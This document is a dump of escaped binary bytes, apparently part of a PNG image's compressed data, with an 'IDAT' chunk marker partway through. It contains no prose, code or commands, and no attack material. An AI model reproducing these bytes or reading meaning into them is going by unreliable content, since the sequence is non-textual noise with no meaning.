%Q\\xd6\\xad[\\xb7\\xb0\\xedW\\xeb4Sx\\\nh\\xe0 \\xab\\x8c+\\x86\\xad\\xedl<\\x87V\\xf8\\xfbu\\\n\\xe7\\xce\\x1d\\xe4\\xb27\\xc1\\xcc5\\xc3\\xd4S\\x9d:u\\xea\\\np\\xc1c\\xd5\\xcdfw\\xee\\xdc\\xe1rh\\xa5\\xd4\\xa0\\xd5\\\nc\\x9fX\\x89\\xad\\xd0\\xb2Ud\\xd8\\xf6\\xe3R\\xb1\\x0b\\x17\\\n\\xa7N\\x9d\\xe4\\xcea\\x1b\\xff\\x98\\x9bn\\xa0\\xc7\\x96\\xef:\\\nR%\\xc5\\xe0\\xd0\\xc1\\x03\\x82\\xd7<<<\\xd1\\xb8\\xb1y\\\n\\x9b\\xdc\\x00\\xe0\\xfe\\x1e=\\xe1\\xe9\\xe9Y\\xf9syy9\\\n\\x16|\\xfe\\x19\\xd7>>)9\\x19\\xef\\xbc;\\xdd\\xac}\\\n\\x22\\xa4\\xfaQ@\\xab\\xa0\\xa7\\x9f\\x19\\x8eg\\x86?g\\xf4\\\n\\x9c\\xf0\\x88\\x08nw\\xa5T\\xcd\\x98;\\xd0\\xac\\xac+\\x95\\\nyQ\\x87\\xff\\x16>\\xc6\\x8d\\x8bk\\x22\\xabx}dd\\\n}\\xae\\xe88\\xdbj\\xf74s\\x11\\x0b\\x09\\xe5\\x1fEI\\\n\\xc1\\x96\\xee*/+\\xe3R\\x19\\xd8\\x0b\\xbd\\xb7\\xb7\\xb7Y\\\n\\x9f\\xc5\\xaetd\\xa4\\xff\\x17\\xd0\\xe6\\xe5]Gyy\\xb9\\\n\\xe0uS9\\xb4\\x00\\xbf\\xe2\\xc2\\x06\\xb0l}^c_\\\nx*\\x95\\x0a~~\\xc2UZ\\xb1\\xbc4{a\\xc9\\xea\\\nl\\x9b\\xb6\\xed\\x14\\x9c\\x091e\\xc7\\xf6m\\xa2\\xcdH,\\\n\\xe5\\xe5\\xe5\\x85n\\xf7\\xdd\\xaf\\xf8\\xb8\\x86\\x140y\\xe9\\xc6\\\nrh\\xbd}|\\xb8\\xbc\\xde\\xaa7\\xacEEE(a\\\n\\xdat\\x9bJ9\\x00\\xf8kF\\xd5<\\xfb\\xcb\\x97/s\\\n7\\xf2\\xf5\\xcc\\xd8\\xdc\\xc4\\x95\\xee\\x12Y\\xa1e\\x03Os\\\n7\\x84\\xe9\\xb1\\x0b\\x17\\xecwAaa\\xa1\\xe0\\x1a\\x0bH\\\n\\xef\\x10\\xc6b\\x9f0\\x9eM=S\\xf9\\xfb\\xc8\\x06\\xb4I\\\n\\xc9\\xc9\\xb2:uy{{\\xe3\\xe9a\\xc3\\x8d\\x9e\\x13\\x16\\\n\\x16\\x8e\\xb9\\x1f\\x7f&\\xa9\\xad;\\xa9Y\\x14\\xd0*l\\xec\\\nK\\xe3\\xf1\\xe8\\xe3\\x83E_svv\\xc6\\x94i\\xef\\x9a\\\n\\xec\\xcfmHrr3\\xee\\xbd\\xfa?l6\\x7f\\xb6E\\\nK\\xe1j\\xaeT*\\x95\\x0aM\\x98\\x8b\\x1d[\\xf3\\x96M\\\n\\x0d\\x88\\x91\\xd9\\xb6\\xd2\\xcf\\xcf\\x8f{\\xc4\\xc7\\xd6\\xd1\\xfd\\xf7\\\n\\xb2p#\\x83\\xd4\\xd5Y=6\\x17-=\\xedB\\xe5\\xff\\\n\\xcf\\xa6\\x1b\\x00\\xa6Wh\\x01>@\\xad\\x1a\\xd0\\xeat:\\\n\\xee\\x91\\xa4\\xa9:\\x9blw\\x22{\\xed\\x16V^^\\x8e\\\n\\xb5?\\xfc \\xfb\\xfdR\\xcb\\xdc\\x11eX+\\xdd\\xa0_\\\n\\xff\\x01f\\xa7\\x5cY\\x82\\x0d\\xca\\x8d\\xad\\xd0\\xaaT*n\\\n\\x956'\\xe7\\xbf\\xbfo\\xf6i\\x0c`:\\xe5\\x000^\\\n\\x8b\\xf6\\x22\\x93n\\x00\\x98\\xb7B\\xcb\\xe5\\xd02\\x01\\xed\\xcd\\\n\\x9b7\\xb9\\xc6\\x04\\xe6\\xe6\\xcf\\xea\\xb1+\\xb4W\\xae\\x5c\\x11\\\n\\xdc\\x80\\x1f?\\x9e\\xc2\\xd5'\\x97\\xbdB\\xcb\\x04\\xb4Z\\xad\\\n\\x16)\\xc7\\x8e\\xe1\\xe6\\xcdb\\x9c\\xfcG\\xf8=\\xd1\\xb2\\x95\\\n\\xbc\\xef;\\x00\\x186\\xfcY\\x83\\x8bL\\xfe\\xfe\\xfe\\xf8d\\\n\\xfe\\xe7\\xd4\\x09\\xccFP@k\\x05\\xafO\\x9a\\x8c\\x91\\xa3\\\n_\\x14\\x5c\\xb4\\x13\\x9b&a\\xd9\\xca\\xaf\\xd0\\xbau\\x1b\\xd9\\\n\\xe3\\xba\\xbb\\xbbs\\xab\\x9a\\x07\\x0f\\x1e\\xc0\\xbf\\x97.q\\x9b\\\n\\x17,\\xf9\\x03gS\\x15\\xaa>B\\xd2j\\xb5\\x5c5\\x02\\\n9\\xe9\\x06z\\xec\\xa3/vC\\x01\\xbb3W\\xea\\x860\\\n=~c\\xd8\\x7f_\\x1e\\xec\\xca*`:\\x87\\xf6\\xee9\\\nl@\\xfb_`\\x9cw\\x9d_\\xf55\\xb53\\xdf\\x9f\\x09\\\nho\\xdc\\xb0\\xcf\\x15\\xda\\xcd?m2X\\xd7\\xd8\\x14o\\\noot\\xec\\xd4Y\\xe1\\x19\\x11C233\\xb94&\\\n%\\xa8T*<\\xf2\\x98\\xf8\\x0d\\xbf5\\x94\\x97\\x97s\\x1b\\\n\\xb0||\\x8c\\xe7\\x8e\\xd6e\\x02\\xda\\xac\\xac\\xff6y\\x8a\\\n5U0\\x95r\\x00\\xf0O~\\xaa\\xe6g\\xb2+\\x9a.\\\n\\xae\\xae\\x92\\x82d=S\\xcd\\x15\\xce\\x9c\\xe6\\xab\\x8a\\x98[\\\n\\xe1@/\\xba\\x91\\xb0<\\xa3N\\xa7\\x13\\xe4\\xd1\\xb2O\\xf3\\\n\\x02\\xea\\xd6\\xe5\\xaa\\x00I\\x15\\x1e\\x11\\xc1-\\x06\\x1c=r\\\n\\x18G\\x0e\\x1fFEE\\x85\\xe0\\xb8%\\xdf\\xab\\x1a\\x8d\\x06\\\n\\xb3\\xe7\\xcc\\xc5C\\x03\\x1f\\xae\\x5c\\xe5U\\xa9T\\xe8\\xd2\\xf5\\\n^\\xac\\xfa\\xe6[DG7\\x92=6\\xa9^\\xf2\\xfaO\\\n\\x12\\xa3T*\\x15F\\xbc0\\x0aC\\x9e|\\x0a\\x97/\\xff\\\n\\x0b??\\x7fI\\x17=)\\x9a\\xb7h)X\\xc5\\xfc\\xfb\\\n\\xafC8\\xcc\\x94\\xebR\\xab\\xd5f\\xef\\xf8\\xac\\x8a\\xdd\\x18\\\n\\x96\\x9d\\x95\\x85\\x9c\\x9c\\x1c\\x04\\x07\\x07\\xe3\\xd2\\xa5K\\xdc#\\\n7K6\\xea\\xc4\\xc6\\xc6b\\xdf\\xef\\xbfU\\xfe\\xcc\\xb6\\xdb\\\ne\\x03Z\\xa9\\x1b\\xc2\\xf4\\xd8\\xd2]Ush\\xd9\\x15Z\\\nwwwA>\\x95!l\\x80Zu\\x1c6\\xbf\\x0e\\x00\\\n\\xea\\x06\\x9a\\xb7B{\\xab\\xe4\\x96\\x813m\\x97V\\xab\\xc5\\\nW+W\\xc8~\\xff\\xc3\\x83\\x1e\\xad\\xd6U=G\\xb7q\\\n\\xc3:\\x93\\xbd\\xed\\xe5h\\xdf\\xa1c\\xb5m\\x06\\x03&\\x86\\\n\\xdf\\xcc\\x00\\x00 \\x00IDAT\\x80\\x92\\x92\\x9b\\xdc1\\\nc\\x9b\\xc2\\x00\\xfe\\xef;\\xa7\\xca\\xdf4{\\x13\\xec\\xea\\xea\\\n\\xca\\xa5h\\x891\\x96r\\x90\\xce\\x04\\xb4\\x11\\xe1\\xd2Jv\\\n\\xe9\\x05\\x87\\x84@\\xadVW\\x06\\xad\\xf9\\xf9\\xf9())\\\n\\xa9\\xac\\x93\\xca>\\xf5\\xf2\\xf3\\xf3\\x93\\x94Z%\\xc6\\xcb\\xcb\\\n\\x0b!!\\xa1\\x82\\x9b\\xf8\\xd3\\xa7OV\\xd6cOIQ\\\n&\\x7fV/))\\x19\\xbbw\\xed\\xac\\xfc\\xf9\\xf0\\xe1\\xc3\\\n\\xb8\\xc5l\\x06s\\xf7\\xf0\\xe0\\xbe\\xb3\\xcc\\xe5\\xee\\xee\\x8e\\xb7\\\n\\xa7\\xbe\\x83q\\xe3' ;;K\\xd6\\xa69R\\xf3h\\\n\\x85\\xd6\\x8a<<<\\x10\\x1b\\x1b\\xa7X0\\x0b\\xf0;9\\\n\\xf3\\xf3\\xf3\\xf1\\xfd\\x9ao\\x05\\xc7bb\\x1a[\\xf4\\xc7\\xc8\\\nVS\\x00\\x80\\xe3\\xff\\xbfP\\x89\\x95i\\x91\\xfb\\xf8\\x0a\\x00\\\n\\x1a3\\xefMOO\\xc3\\xcd\\xff\\x07\\xcc\\xb7o\\xdf\\xe6V\\\nD\\xccM9`Whs\\xb2\\xb3++4\\xb0+\\x19\\\nR\\xffwbs\\xe6\\xaa^\\xdc\\xd9G\\x92*\\x95\\xca\\xe4\\\nF&\\xf6q\\x16\\xbb{\\xd7\\x1el\\xfde\\x0b.^\\xcc\\\n\\x90\\xf5^\\xb5Z\\x8dA\\x8f>\\xaa\\xec\\x84\\x88AZ\\xad\\\n\\x16\\x9b\\x7f\\xdad\\x95\\xb1\\x1f\\x1b\\xfc\\x84U\\xc65\\xe4\\xe6\\\nM\\xbeb\\x88\\xb1\\x94\\x03\\x80\\xdf\\x18V\\xb5y\\x0a[\\x92\\\nO\\xeaJ*{m\\xa9\\xda\\x5c\\xe1\\xe2E\\xa6d\\x97\\x19\\\n\\xe9\\x06\\xc0\\xddT66\\xa5\\xa1j\\xda\\xc1)&\\xa0\\x95\\\n\\xbb!L\\x8f\\xadG\\xab_\\xa1\\xbds\\xe7\\x0e\\x97\\x0a`\\\nq@\\xcb\\xa4\\x1d\\x9c:\\xf9\\x0f\\xfe\\xdc\\xf7\\xbb\\xe0X\\xcb\\\n\\x16-e\\xa7\\xf1\\xb1|||\\x10\\x1b\\x1bG\\xc1\\xac\\x8d\\\n\\xa2\\x80\\xd6\\xc64o\\xd1\\x82\\xdbi\\xc9\\xa6\\x00X\\x92n\\\n\\x00\\xdc]\\xa1`\\x1f\\x13\\x1d\\xfb\\xff\\xa3$\\xb6L\\x8b\\xab\\\n\\xab+\\xea[\\xb0\\xe2\\xc2\\xd6\\xa2\\xd5j\\xb5\\x95;r3\\\n33\\xb9GeR\\xbb\\x84\\xe9\\x85\\x87Gp\\xc5\\xb3\\xf5\\\n9k\\xecjK\\x90\\xc4/'\\xfe\\xcb\\xa3\\xca\\x0a-\\xb3\\\n!\\xcc\\xc7\\xc7\\xd7d\\xf1x6\\xe5\\xa0\\xd4@\\xa7\\x1f[\\\nUZZ\\x8a\\xcf>\\x99'\\xfb\\xfd\\xdd{\\xf44\\xab\\xad\\\n\\xb2\\x1cw\\xee\\xdc\\xc1\\xb5kWq\\xfe\\xfc9d^\\xbe\\\n\\x5cc\\xa5\\xd3\\xb4Z-W\\xd2\\xa9\\xba\\x1d<\\xb0_4\\\nW\\xd4R\\x11\\xf5\\xea\\xa1\\xa3\\xcc\\x0d\\xb1r\\xb1O\\x93\\x00\\\n\\xbe\\xf63\\x8b]\\xa1\\xadzSmnS\\x85\\xca1\\xd9\\\n\\x0e\\x83U\\xfe}\\xd9\\x94\\x03sJv\\xe9\\x85\\x87G\\x08\\\n~\\xaez\\xb3\\xcen\\x08\\x93\\x9bn\\xa0\\xc7\\x96\\xd3\\xd2o\\\n\\x0c;s\\xe64w3.\\xb68b\\x0e\\xb6\\xd2Ay\\\ny9\\xd7 \\xa7U\\x1b\\xf9\\xe9\\x06\\xc4\\xbeP\\xca\\x81\\x8d\\\n\\xf1\\xf5\\xf5C\\x83\\x06\\x0d\\x91Ves\\x13K\\xee\\x86\\xb0\\\n\\xaa\\x9a6M\\x12\\x5ct\\xf5\\x1b\\xc3\\xd8\\xe09&\\xa6\\xb1\\\n\\xac\\xdd\\xa5z\\xf5\\xeaE\\xc2\\xdd\\xdd]\\x10@\\x9c\\xa0-,,\\\n\\xe4J\\x1f6i\\x12o\\xf6\\xf8U\\xb1+\\xb4\\x99\\x99\\x99\\\n((\\xc8\\xe7\\xda\\xd3\\xaa\\xd5j$65\\xbf\\xb9OU\\\n\\xf1\\xf1\\x09pqq\\xe1\\xf6%T\\xd5\\xbaM[\\x8b>\\\n\\x83\\xd8\\x0fZ\\xa1\\xb5A-Z\\xb64\\xf8\\x9aJ\\xa5\\xe2\\\n\\xda\\xe4\\xca\\xc1\\xee0M=s\\x06%%%\\x5c\\xca\\x01\\\n[K\\xd6\\x5cj\\xb5\\x9a\\xcb\\xc1\\xd5\\xe7|\\xfd\\xfb\\xef%\\\n\\xee\\xfc\\xb0p\\xf3W\\xea\\xd8J\\x07\\x19\\x95+\\xb4\\xe65\\\nU\\xd0\\x13\\xdb\\xe4\\xa5\\xff\\xd2cW\\xb6\\x02%\\xd4M\\xf5\\\ncR\\x0e\\xd8\\xba\\xb4\\xb6,+\\xeb\\x0aV\\xaeX&\\xfb\\\n\\xfd\\x0f\\x0d|\\xd8\\xac\\xaeIR\\xec\\xde\\xb5\\x13\\xcf<\\xfd\\\n$\\x1e{d \\xbe\\x5c\\xba\\x04'\\x8e\\xa7p\\xc1,p\\\n7\\x7f{\\xdb\\xaf[1{\\xd6L\\xf4\\xeb\\xdd\\x13\\x8f?\\\n\\xfa0\\x96}\\xb9T\\xf6\\xc66Svl\\xdf\\x06\\xa8T\\\n\\x8a=>\\x95\\xa3\\xb0\\xb0\\x10{\\xf6\\xecV|\\xdc:u\\\n\\xea\\xa0\\xdf\\x80\\x07\\x14\\x1f\\xd7$\\xe6iV``\\xa0\\xc9\\\n\\x7f_6\\xe5\\xa0\\xa0\\xa0\\xa0\\xb2\\x8d9\\x9br \\xf5\\x9a\\\n\\xc1\\x9eWVV\\x86\\xfc\\xfc|\\xd1\\x0a\\x07l\\x9a\\x94\\x14\\\n\\xec\\x0a\\xad~\\xef\\xc1\\xa9S'\\xb9\\x5ch6\\xcd\\xcb\\x5c\\\nbm\\xceO\\x9f>\\x8d\\xe3)\\xc2\\x86\\x0a11\\x8d\\xe1\\\n\\xe1\\xe1a\\xd1g\\xb9\\xb8\\xb8\\x18]Q\\xf6\\xf1\\xf1\\x91U\\\n\\x7f\\x96\\xd8'\\x0ahmP\\xfb\\x0e\\x1d\\x0d\\xbe\\xd6\\xb0a\\\n4\\xfc\\xfc\\x8c?R\\x93\\x82m\\x9b[QQ\\x81\\xad\\xbf\\\nlAQQ\\x91\\xe0\\xb8%\\xf9\\xb3zq\\xcc\\x8a\\xc1?\\\n\\xff\\xdf\\x18\\xc6n\\x08\\xf3\\xf1\\xf1\\x81\\x87\\x87\\xe9M[,\\\n\\xb1Z\\xb4\\x85\\x05\\x05\\xdcce)\\xf5$\\x01\\xf1\\xcdc\\\n\\xfa\\xe0\\x98\\x0d\\x92\\x03%|\\xe1\\x05\\xf8\\x0bS\\x0e\\xec\\xa9\\\n\\xde\\xe1\\xac\\x19\\xef\\xcb\\xce\\x09\\xf6\\xf0\\xf0\\xc4\\x88\\x17F)\\\n6\\x97sg\\xcfb\\xf8\\xd3C\\xf1\\xca\\xcb/q\\x85\\xd3\\\n\\xa58\\x9b\\x9a\\x8a\\xf9\\x9f~\\x82>=\\xbbc\\xfc\\xb81\\\n\\xd8\\xb3{\\x17W?T\\xae\\x94c\\xc7\\xb0d\\xd1B\\xf4\\\n\\xed\\xd7_\\x91\\xf1\\xe4\\xfa\\xf5\\x97-\\xa2\\xc1\\xbd\\xa5\\xfa\\xf4\\\n\\xebo2w\\xd5\\x1a\\xd8\\xf4\\xac\\xc8\\xfaQ&\\xdf\\xc3\\xde\\\n\\xb0\\xeat:dggA\\xab\\xd5\\x0ar_\\x01iu\\\n\\xab\\x01\\xc0\\xd7\\x97O=\\xca\\xca\\xba\\xc2m\\x08\\x03\\xe4\\xa5\\\n\\x1c\\xb0\\xa9X\\xe9iw\\xdb|\\x9f:)L7pw\\\nw\\xe76\\xca\\x9a+*\\xaa\\x01\\xf7\\xdfr\\xfa\\xd4\\xc9\\xca\\\n\\xb44\\xbd\\xa4\\xe4d\\x8b>G\\xaf\\x15\\xd3\\x9e\\xb6\\xaa\\x16\\\n-[U\\xfb\\xaa?\\xa9\\xbd\\xe87\\xc1\\x06\\xb5i\\xdb\\xce\\\n\\xe0*\\x9e\\xb1\\xd5[s\\xc4\\xc65\\xe1.Z\\xdf\\x7f\\xf7\\\n-w\\x9e\\x12w\\xc7l)\\xb2\\xec\\xac,\\x5c\\xcf\\xcd\\xc5\\\n\\xbf\\x5c\\xc9.y\\x8f|#\\xeb\\xf3\\x01-\\x1bx\\x02\\xc6\\\n[\\xd4\\xb2\\xb8\\xe6\\x0a\\xff\\x7f\\x14\\xc9\\xae\\xe0\\xd45Q\\x83\\\n\\x16\\xe0\\xeb\\xd4\\xba\\x9a\\xc8\\xb9\\xb5\\x15\\xdb\\xb7\\xfd\\x8a\\xdf\\x7f\\\n\\xdb+\\xfb\\xfdc\\xc7\\xbdd\\xb2\\x86\\xaf\\x14:\\x9d\\x0e\\xdf\\\n|\\xb5\\x0aC\\x87<\\xceu1\\x92\\xa3\\xa2\\xa2\\x02\\xbf\\xed\\\n\\xdd\\x83\\x09\\xe3\\xc7\\xa1w\\xcf\\xfb\\xf1\\xc9\\xc7s+\\x03\\x08\\\n9\\xd2\\xd3\\xd2\\xf0\\xf2Kc1z\\xcc\\xd8\\x1a]\\x9d\\x05\\\n\\x80\\x0dVH7P\\xa9Txb\\xc8\\x93\\x8a\\x8f+\\xe9\\\n\\xb3!\\x0ch\\x93\\x92L?\\x02\\x17KI\\xc8\\xce\\xca\\xc2\\\n\\xb5\\xabW\\xb9rQR\\xeaV\\x03\\xff\\xafo\\xcb\\x9c{\\\n1#\\x83\\xab\\x0f\\xeb\\xea\\xea*\\xf9\\xc6\\xba\\xaaP\\xa6\\xfa\\\nKZ\\xba>\\xa0\\x15n\\xd2\\x8ailY\\x8a\\x18p\\xf7\\\n\\x09R\\x83\\x06\\x0d\\x05\\xc7vl\\xdf\\xce\\xb5\\x8aMn\\xd6\\\n\\xdc\\xa2\\xcf\\xd1\\xeb\\xdc\\xa5\\x8b\\xc1\\xd7ZS\\xfe,\\xa9\\x82\\\n\\x02Z\\x1b\\xe4\\xe1\\xe1\\xc1\\xed\\xfe\\xd4\\x93\\xd3\\xeeV\\x8c\\x8b\\\n\\x8b\\x0b\\xd7M\\xe6l\\xaa\\xb0\\x05\\xaeZ\\xad\\x16}\\xfcd\\\n.\\xb1\\x9c\\xae\\x93'\\xff\\xc1e\\xae\\xa9\\x82\\xbc\\x8dA\\xec\\\n\\x8a\\xc7\\xa5K\\x17\\xb9`\\x19\\x90\\xbeB{\\xf7\\x5c\\xbe\\x16\\\n\\xad\\xfe1bU\\xd2rh\\x03\\xd0\\xb9\\xf3=\\x00\\xee\\xae\\\n\\xf8X\\x9a\\xc6Q\\x1b\\x14\\x15\\x15\\xe1\\xc3\\x0ff\\xc9~\\x7f\\\nRr2\\x06=\\xfa\\x98\\xc5\\xf3\\xc8\\xcb\\xcb\\xc3\\x8b\\xa3F\\\n\\xe0\\xa39\\xb3\\x8d\\xe6\\xe1\\xc9u=7\\x17+\\x97/\\xc3\\\n\\xc3\\x0f\\x0d\\xc0\\xb0\\xa7\\x86\\xe0\\xfb\\xef\\xd6\\x98\\x95\\x92p\\xe8\\\n\\xe0\\x01\\x0c\\x1f6\\x14\\xcd\\x9a7G\\xd7{\\xbb)>?\\\ns\\x9c9sZ\\xb4\\x8a\\x89\\xa5:\\xdf\\xd3\\x05\\x0d\\x1bF\\\n+>\\xae\\x14\\x1a'\\x0d||}Q/2\\x12\\xad\\xdb\\\n\\xb4E\\xdf~\\xa6\\xf3\\x93===\\xb9.\\x8b9\\xd9\\xd9\\\n\\x82j\\x07z\\xe6\\xd4\\x8beo\\x82\\xd3\\xd3. #]\\\nx#\\x14\\x11QOV\\xc0\\xc96W\\xb8\\x9a\\x93\\x83\\xc2\\\n\\xc2B\\x91\\x0a\\x07\\x96m\\x08\\xd3c\\xd3\\xc4\\xc4~o\\xd8\\\n\\xb45\\xb9\\x9a6M2XN\\xb1\\x95\\x05\\xf5g\\x89\\xfd\\\n\\xb1\\x9fd=\\x07\\xd3\\xbbO\\x1f\\x1c\\x11\\xa9?\\xdb\\xd2\\xc8\\\n\\xe3\\x19s5MJ\\xe6\\xf2\\xa2\\xaa\\x8a\\x88\\xa8gq\\x8e\\\n\\x14\\x004\\x8c\\x8e\\x86\\x8b\\xab\\xab\\xe0Q\\xe7\\x89\\xe3)\\xc8\\\nd:\\xde\\xc8\\xdd\\x94\\xc3\\xe6\\xa4\\x95\\x97\\x97s\\xad\\x82\\x01\\\n\\xe9\\x9b\\xc2\\x00\\x91Z\\xb4YY\\xc8\\xce\\xce\\xe2\\xf2\\xd5L\\\n5U\\xd0\\xfbd\\xfe\\x02\\x94\\x96\\x96\\xdaM\\xad\\xd5O>\\\n\\x9e\\xcb\\xad\\xd8H\\xe5\\xe2\\xe2\\x82\\xb7\\xa7\\xbec\\xf1JR\\\nV\\xd6\\x15\\x8c~a\\x84\\xecra\\xe6:\\x9e\\x92\\x82\\xe3\\\n))\\x98=k\\x06\\x12\\x12\\x9b\\xa2]\\xbb\\xf6HLJ\\\nB\\xd3\\xa6M\\xb9\\x9d\\xf5\\x19\\x19\\x19\\xf8j\\xe5rlX\\\n\\xbf\\x0e\\xfe\\xfe\\xfexk\\xca\\xb4j\\x99\\xa31kV\\xaf\\\n\\xb6\\xca\\xb8O\\x0f{\\xc6*\\xe3J\\x11\\x1d\\xdd\\x08\\xbb\\xf7\\\n\\xee3\\xfb}\\x81\\x81A\\xb8t\\xe9b\\xe5\\xcfY\\xd9Y\\\np\\x15\\xf9\\xdb4\\xa7\\x9e+{}IKK\\x13\\xd4\\xc5\\\n\\x06\\xcc/\\xd9\\xf5\\xdf\\x9e\\xfb\\xc6\\xc8\\xebl\\xc9-\\xb9\\\n\\x9c\\x9c\\x9c\\xd0\\xa8Q#A\\xbe\\xd7\\xae];\\xb9\\x5c>\\\n9\\x1b\\xc2\\x80\\xbb\\x81\\xb0\\x93\\x93\\x93 \\xdf\\xf1\\xcf?\\xff\\\n\\x10\\x9c\\xa3\\xd1h\\xb8j\\x03\\xc6p\\xbb\\x96\\xaf\\x5c\\x11-\\\nud\\xaa\\x06mU\\xf6\\x12\\xcc\\xfe\\xfd\\xf7_X\\xbf\\xf6\\\nG\\xd9\\xef\\x1f3\\xee%\\x8b\\xbf\\xa8\\xd2\\xd3\\xd20z\\xe4\\\n\\xf3\\x92\\xab+\\xb8\\xb8\\xba\\xa2e\\xcbVh\\xd3\\xb6\\x1d\\xa2\\\n\\xa3\\xa3\\x11\\x10P\\x17\\xb7o\\xdf\\xc6\\x95+\\x998\\x9e\\x92\\\n\\x82\\xdd\\xbbwr\\xe9$\\x86h\\xb5Z\\x9c8\\x9e\\x82\\x13\\\n\\xc7\\xff\\xbb\\x19t\\xf7\\xf0@@@\\x00|||q\\xed\\\njN\\xe5\\xbc\\x9c\\x9c\\x9c0c\\xd6\\xec\\x1ao\\xadYP\\\n\\x90\\x8f\\xad[\\xb7\\x98>\\xd1L\\x09\\x09\\x89\\x8alR\\xad\\\nn\\x81A\\x81\\x82\\x806';\\x1bu\\x5c\\x85\\x7f\\x9fN\\\nNN\\xdc\\x86Nc\\xd8\\x15\\xda\\xb3\\xa9g\\xb8\\xd2\\x81r\\\n\\xf3[5\\x1a\\x0d\\x82\\x83C\\x04\\xe5\\xba\\xbe[\\xc3\\xdf\\xa0\\\n\\xb0\\xe9]r\\x99j\\xa6\\x93\\x94\\xa4L\\xfe\\xac\\xde\\x88\\x91\\\n\\xa3\\xf1\\xe7\\x1f\\xfbp\\xe3\\xc6\\x0d\\x00w\\xf7SL{w\\\n:\\x97#M\\x1c\\x1b\\x05\\xb46\\xca\\xc9\\xc9\\x09\\x0b\\x16/\\\n\\xc5\\xae\\x9d\\xdbq\\xfe\\xdcy\\xb4m\\xd7N\\x91r]U\\\n%%\\x19\\x7fd\\xa4\\xd4\\xdd>\\x004i\\x92 \\x08h\\\n\\xc5r\\x12\\xe5\\xae\\xd0:99q\\xa5\\xbb\\xd8\\x0dgu\\\n\\xeb\\xd65kE\\x90\\xdd\\xec\\x95\\x95uE\\xf4\\x91d`\\\n\\x90\\xf4\\x80\\xd6\\x1e\\x94\\x95\\x95a\\xfa;\\xd3dw\\x99j\\\n\\xdb\\xae=\\x9e\\x182\\xd4\\xa29\\x5c\\xb8p\\x1e#\\x9e}\\\n\\x86K\\xff\\x10\\xe3\\xe3\\xeb\\x8ba\\xc3\\x86\\xe3\\xc1\\x81\\x0f\\x8b\\\nnZJJNF\\xaf\\xde}\\xf0\\xea\\xeb\\x93p<%\\\n\\x05[\\xb7n\\xc1\\xe6M\\x9bp\\xf3f\\xb1Ys*\\xb9\\\ny\\x13%7o\\xe2_\\xfc\\xf7;\\xa8R\\xa9\\xf0\\xd6\\x94\\\ni\\xb5\\xa2\\xec\\xd0\\xda\\x1f\\x7f\\xb4\\xcaf\\xb0\\xa7\\x9f\\x19\\xae\\\n\\xf8\\x98\\xd5\\x81\\xef\\x16\\x96\\xcd\\xad\\xd0\\x06\\x06\\x06\\x99u\\xcd\\\n\\x08\\x0d\\x13\\x96\\xd6b\\x9f@\\x01\\xf26\\x84\\xe9\\x85\\x85\\x85\\\n\\x09\\x02Z\\xb6f\\xb8\\x93\\x93\\x13\\xa2\\x1b)\\xb3\\xa2\\xd9\\xd8\\\n\\xc4\\x0a\\xadR\\xf9\\xb3zQQQ\\xf8~\\xed\\x06l\\xff\\\nu+*\\xb4Z\\xf4\\xee\\xd3G\\xf2\\xd3/\\xe28(\\xa0\\\n\\xb5a\\x1a\\x8d\\x06\\xdd{\\xf4B\\xf7\\x1e\\xd6\\x19?8$\\\n\\x04AAA\\xb8zU<'P\\xc9\\x5c\\xcf\\xb8&\\xa6\\\n\\xc72\\xb7\\xedmU\\xf5\\xeaE\\x0a\\x02Z\\x96\\xd4\\xa6\\x0a\\\n\\x95\\xe73+\\xb4yyy\\x5c>\\x9cJ\\xa5B]3\\\nV}\\xed\\xc1\\x17K\\x16\\x09V\\xb6\\xcc\\xe1\\xeb\\xeb\\x87w\\\n\\xde{\\xdf\\xa2T\\x83\\x8c\\xf4t\\x8c|\\xfeY\\x93\\xc1\\xac\\\nZ\\xad\\xc6\\xc0\\x87\\x07\\xe1\\xc51\\xe3$\\xb5.U\\xa9T\\\nHn\\xd6\\x0c\\xc9\\xcd\\x9a\\xe1\\xc51\\xe3\\xb0n\\xed\\x8f\\xf8\\\nz\\xd5J\\xd9i\\x15j\\xb5\\x1aS\\xa6\\xbe\\x83\\x01\\x0f<\\\n(\\xeb\\xfdJ\\xaa\\xa8\\xa8\\xc0\\x8f?|\\xa7\\xf8\\xb8\\xe1\\xe1\\\n\\xe1\\xe8v\\xdf\\xfd\\x8a\\x8f[\\x1d\\xb8\\x94\\xa2\\xec,83\\\n\\x9b5\\xa5\\xd6\\xa0\\xd5\\x93rC^Of\\xca\\x01\\xf0\\xff\\\n\\xeb\\xa3H*\\x95^\\xc3\\xe8h\\x93M^\\xa4\\xd2\\xa7\\x14\\\n\\xb05n\\xf5\\x94\\xca\\x9f\\xad*((\\x08C\\x86>\\xa5\\\n\\xf8\\xb8\\xc4~\\xd0\\xa60bTS#\\x8f\\x8e\\x94\\xac\\xff\\\n\\xd7\\xa4I\\x82\\xc9s,\\xe9\\x16e\\xaa\\x96\\xa9\\xb9\\xed\\x89\\\n\\xd9\\xc7\\x87:\\x9d\\x0e)L\\xbe\\xb1\\xb7\\x8f\\x8f]\\x95\\xe0\\\n2\\xe5\\xd2\\xa5\\x8b\\xf8j\\xd5JY\\xefU\\xab\\xd5\\x98>\\\nc\\xa6Em\\xa2\\xff\\xbdt\\x09/<\\xff,\\xae_\\xbf\\\nn\\xf4\\xbc\\xa0\\xa0 \\xacX\\xf55&\\xbf5ER0\\\n\\xcb\\xf2\\xf4\\xf4\\xc4SO\\x0f\\xc3\\xe6-[1i\\xf2[\\\nf\\xff^\\xfa\\xfb\\xfb\\xe3\\xb3\\xcf\\x17b\\xc0\\x83\\x0f\\x99\\xfd\\\n\\xd9\\xd6\\xb0k\\xe7\\x0e\\xc9\\xe9\\x14\\xe6\\x18\\xfa\\xd40\\x9b-\\\n\\xa9\\xc4n\\xe6\\xcc\\xfe\\x7f\\x8e|U\\xe6\\xe4\\xcf\\x02\\xd2n\\\n\\xc8-\\xa9\\xb9\\x1cjb\\xd3\\xacR\\xe9\\x06z-\\x0d<\\\n\\x11tqqA\\x93&\\xca~\\x16!R\\xd8\\xe6\\xd5\\x86\\\nT\\x9b\\xe6\\xcd[\\x88\\x1e\\x0f\\x0d\\x0d3\\xfb\\x82nL\\xa3\\\n\\x98\\x18\\xa3\\x0d\\x05|}\\xfd,\\xda\\x80\\xc6\\x96\\xeeb\\x99\\\n\\x1bH\\x89\\xad\\xce\\xb0;\\x8a-\\x09\\xcel\\xd1\\x073g\\\n\\xc8\\xae$\\xf0\\xecs#\\xd0\\xc1\\x82\\xb6\\xa8\\xd7\\xae]\\xc5\\\n\\xe8\\x91\\xcf\\x9b\\xac0\\x90\\x90\\x90\\x88\\xafV\\xaf\\xb1